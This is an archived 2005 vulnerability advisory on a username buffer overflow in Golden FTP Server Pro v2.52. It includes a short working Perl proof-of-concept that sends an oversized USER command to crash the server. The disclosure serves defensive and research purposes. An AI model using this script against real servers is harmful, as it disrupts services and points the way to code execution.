Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)

2005-04-28T00:00:00
ID SECURITYVULNS:DOC:8475
Type securityvulns
Reporter Securityvulns
Modified 2005-04-28T00:00:00

Description

Summary: Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005) (http://www.goldenftpserver.com/)

Details: Passing an overly long username parameter to the FTP server causes the EIP register to be overwritten after the USER/PASS login sequence is completed. Once this has been done the FTP will either crash or execute code (depending on the value of the username) when the server statistics are viewed by an administrator.

Vulnerable Versions: Golden FTP Server Pro v2.52 (10.04.2005)

Patches/Workarounds: The vendor was notified of the issue. There was no response.

Exploit: Run the following PERL script against the server. Afterward, right click on the Golden FTP Server Pro icon in the Windows tray and click Statistic. The process will die.

===== Start GoldenFTPServer_Overflow.pl =====

Usage: GoldenFTPServer_Overflow.pl <ip>

GoldenFTPServer_Overflow.pl 127.0.0.1

KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)

Download:

http://www.goldenftpserver.com/

use IO::Socket; use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Attempting to kill Golden FTP Server at $ARGV[0]:21...";

    sleep&#40;1&#41;;

    print $socket &quot;USER &quot; . &quot;A&quot; x 332 . &quot;BBBB&#92;r&#92;n&quot;;

    sleep&#40;1&#41;;

    print $socket &quot;PASS &quot; . &quot;&#92;r&#92;n&quot;;

    close&#40;$socket&#41;;

} else { print "Cannot connect to $ARGV[0]:21\n"; }

===== End GoldenFTPServer_Overflow.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com)